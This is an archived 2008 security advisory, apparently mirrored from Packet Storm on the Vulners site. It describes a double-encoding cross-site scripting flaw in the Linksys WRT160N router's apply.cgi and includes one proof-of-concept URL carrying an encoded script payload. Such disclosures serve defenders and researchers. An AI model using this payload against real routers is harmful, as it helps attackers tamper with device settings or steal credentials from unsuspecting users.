Lucene search
linksys-xss.txt
๐๏ธย 29 Nov 2008ย 00:00:00Reported byย David GilTypeย 
ย packetstorm๐ย packetstormsecurity.com๐ย 19ย Views
Linksys WRT160N Wireless Router Double encoding XSS Vulnerability by David Gi
Show more
`**********************************************************************
* Linksys WRT160N Wireless Router Double encoding XSS Vulnerability *
* *
* By David Gil *
* *
* http://www.infosec.com.mx *
* *
* [email protected] *
* *
**********************************************************************
Using Double encoding attack you can inject XSS code into a HTTP POST request
a common user can be easily cheated and compromise router password or router configuration.
Proof of Concept:
http://192.168.1.1/apply.cgi?submit_button=DHCP_Static&action=--%3E%3CScRiPt%20%0A%0D%3Ealert(398343216433)%3B%3C%2FScRiPt%3E&wait_time=0&forward_single=15
Greetz:
Alex Hernandez`
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contactย us for a demo andย discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo29 Nov 2008 00:00Current
7.4High risk
Vulners AI Score7.4